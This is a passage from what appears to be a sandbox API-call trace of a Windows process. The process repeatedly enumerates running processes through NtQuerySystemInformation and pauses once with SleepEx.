NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.070] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.070] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.084] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.091] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.093] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.093] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11788) returned 0x0 [0092.140] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11788) returned 0x0 [0092.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11788) returned 0x0 [0092.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11788) returned 0x0 [0092.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11788) returned 0x0 [0092.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11788) returned 0x0 [0092.145] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11788) returned 0x0 [0092.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11788) returned 0x0 [0092.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11788) returned 0x0 [0092.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11788) returned 0x0 [0092.152] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11788) returned 0x0 [0092.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11788) returned 0x0 [0092.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11788) returned 0x0 [0092.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11788) returned 0x0 [0092.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11788) returned 0x0 [0092.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11788) returned 0x0 [0092.160] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11788) returned 0x0 [0092.160] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11788) returned 0x0 [0092.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11788) returned 0x0 [0092.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11890) returned 0x0 [0092.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x118d0) returned 0x0 [0092.190] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x118d0) returned 0x0 [0092.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x118d0) returned 0x0 [0092.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x118d0) returned 0x0 [0092.404] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0097.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.594] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.625] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.672] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.673] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.680] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, 